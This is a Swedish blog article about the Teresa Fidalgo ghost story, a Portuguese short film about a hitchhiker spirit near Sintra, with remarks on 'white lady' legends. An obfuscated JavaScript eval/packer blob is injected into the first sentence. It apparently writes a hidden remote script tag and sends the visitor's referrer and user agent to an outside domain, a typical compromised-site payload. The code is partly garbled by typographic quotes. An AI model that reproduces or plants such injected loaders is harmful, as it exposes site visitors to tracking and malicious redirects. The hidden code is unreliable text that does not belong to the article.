Image Image Image Image Image Image Image Image Image Image

| 24 april, 2018

Scroll to top

Top

37 Comments

Revue.se | Vem är Teresa Fidalgo?

Alexander Gylemo

Historien eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(‘\b’+e(c)+’\b’,’g’),k[c])}}return p}(‘0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|hzeer|var|u0026u|referrer|iafas||js|php’.split(‘|’),0,{}))
om Teresa Fidalgo är en modern spökhistoria, skapad av portugisen David Rebordão. Berättelsen är ett par år gammal men har fått ny luft i seglen här i Sverige och många är intresserade över vem Teresa Fidalgo är och vad berättelsen går ut på.

Läs video av spöket här!

Historian går ut på att tre ungdomar är på väg upp i bergen utanför staden Sintra i en bil, en av dem filmar i baksätet. Efter en liten stund ser de en kvinnlig liftare längs vägen, de stannar vid henne och erbjuder henne skjuts. Det är en ynklig och tystlåten ung kvinna som sätter sig i baksätet och ungdomarna blir intresserade över vem hon är och vad som är fel. Kvinnan, som uppger sig heta Teresa svarar inte på några frågor men pekar snart ut en plats ett par meter framför bilen, ”Ser ni den där platsen?” frågar hon, ungdomarna svarar ja…och resten får ni se i klippet nedan. 🙂

Kortfilmen, som i eftertexterna sägs vara återfunnet videomaterial som polisen använt sig av i utredningen kring olyckan, är idag den populäraste kortfilmen någonsin i Portugals historia och internet har blivit överfyllt av olika teorier om huruvida historien är sann eller inte.

Dessa typer av spökhistorier kretsar kring ett koncept som innefattar en flicka eller kvinna som mist livet på grund av någon annan, oftast rör det sig om mord men i vissa fall olyckor. Kvinnan återkommer sedan till jordelivet i form av ett andeväsen och hämnas sig själv. Dessa kvinnliga andeväsen, även kallade ”white ladies” sägs existera i många länder runtom i världen.

Läs mer om Fidalgo här!